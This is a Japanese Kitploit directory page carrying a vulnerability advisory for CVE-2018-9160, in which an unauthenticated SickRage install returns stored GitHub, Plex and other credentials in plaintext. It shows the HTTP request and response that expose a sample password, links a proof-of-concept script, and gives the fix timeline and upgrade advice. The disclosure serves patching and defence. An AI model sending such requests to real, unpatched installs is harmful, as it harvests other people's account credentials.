Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
ツール/GitHubGitHub/mechanico/sickragewtf
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

リポジトリを見る
28年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sickrageの平文GitHub認証情報 CVE-2018-9160


  1. 概要

エクスプロイトタイトル: SickRage HTTPレスポンス内の平文認証情報
日付: 2018-04-01
エクスプロイト作者: Sven Fassbender
連絡先: https://twitter.com/mezdanak
ベンダーホームページ: https://sickrage.github.io
ソフトウェアリンク: https://github.com/SickRage/SickRage
バージョン: < v2018.03.09-1
CVE : CVE-2018-9160
カテゴリ: webapps


  1. 背景情報

「SickRageは、テレビ番組向けの自動ビデオライブラリマネージャーです。
お気に入りの番組の新しいエピソードを監視し、公開されると、必要な画質で自動のtorrent/nzb検索、ダウンロード、処理を行うという魔法を発揮します。」 -- https://sickrage.github.io からの引用


  1. 脆弱性の説明

SickRageは、HTTPレスポンス内でGitHub、AniDB、Kodi、Plexなどの平文の認証情報を返します。
前提条件は、ユーザーがSickRageインストールにユーザー名とパスワードを設定していないことです。(デフォルトでは強制されません)

HTTPリクエスト:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTPレスポンス:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. 概念実証

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. タイムライン

[2018-03-07] 脆弱性を発見
[2018-03-08] ベンダーに連絡
[2018-03-08] ベンダーから返信
[2018-03-09] 脆弱性を修正。(https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. 推奨事項

SickRageのインストールをv2018.03.09-1以降に更新してください。
Webアプリケーションへのアクセスを適切なユーザー認証情報で保護してください。


ツールをダウンロード